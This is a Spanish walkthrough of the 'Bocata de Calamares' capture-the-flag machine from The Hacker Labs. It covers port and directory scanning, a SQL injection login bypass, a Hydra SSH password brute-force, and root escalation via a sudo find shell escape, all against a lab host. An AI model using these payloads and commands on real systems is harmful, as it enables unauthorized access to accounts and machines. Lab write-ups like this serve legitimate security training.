> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/the-hacker-labs/bocata-de-calamares.md).

# Bocata de Calamares

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.59
```

para verificar la conectividad de red.

<figure><img src="/files/v3vkmrzezDsOEkijScXG" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.59 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="/files/b2tSKxE8nOq1GJYzR1aH" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH y** el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 192.168.1.59
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="/files/Z6T34xMVE55BuS4NLZBF" alt=""><figcaption></figcaption></figure>

Miramos a ver que contiene el puerto 80 por si encontramos alguna información relevante.

<figure><img src="/files/GGT5qGHGXQvmji2haRp6" alt=""><figcaption></figcaption></figure>

Vemos que nos advierten sobre inyecciones SQL.

<figure><img src="/files/iyOibm5PVI2iumlJbdtt" alt=""><figcaption></figcaption></figure>

Como no encontramos nada más relevante hacemos un escaneo de directorios.

```bash
gobuster dir -u http://192.168.1.59/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

<figure><img src="/files/e9FcDkU3MeCR6zXr3KyI" alt=""><figcaption></figcaption></figure>

Nos llama la atención el archvio **login.php** por lo que miramos que contiene.

<figure><img src="/files/0uwvFBL8NbA02JDl3GpR" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Es un panel de login con el que probamos una **SQL Injectio**n.

```bash
admin
' OR '1'='1
```

<figure><img src="/files/HwqmFLWdtEWmQZnu5Kie" alt=""><figcaption></figcaption></figure>

Accedemos al enlace.

<figure><img src="/files/mAyJKYOjZvVl1g46wb8b" alt=""><figcaption></figcaption></figure>

En el tercer parámetro nos da una pista en la que tenemos que codificar en **base64** la cadena **lee\_archivos**.

```bash
echo "lee_archivos" | base64
```

<figure><img src="/files/wThnlcdvq1xmCnQQaaCJ" alt=""><figcaption></figcaption></figure>

Metiendo esa cadena en el diccionario descubrimos que existe esa página.

<figure><img src="/files/McciaOs6HnKTvGy1vaYw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Wu1t3dgeid7uhQqLf78S" alt=""><figcaption></figcaption></figure>

Hemos localizado al usuario **superadministrator**; procederemos a intentar encontrar su contraseña utilizando **Hydra**.

```bash
hydra -l superadministrator -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.59
```

<figure><img src="/files/hzgFiH4Boh5kNRtzkA8k" alt=""><figcaption></figcaption></figure>

Iniciamos sesión con las credenciales obtenidas.

<figure><img src="/files/7F3QuAN3UIgedURKOo9a" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.&#x20;

<figure><img src="/files/y1yFAWJqno301bou45OH" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/find/>" %}

```bash
sudo find . -exec /bin/sh \; -quit
```

<figure><img src="/files/AUvlUilJ83MEZ9VAqLs1" alt=""><figcaption></figcaption></figure>

Ya somos **root**.&#x20;

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
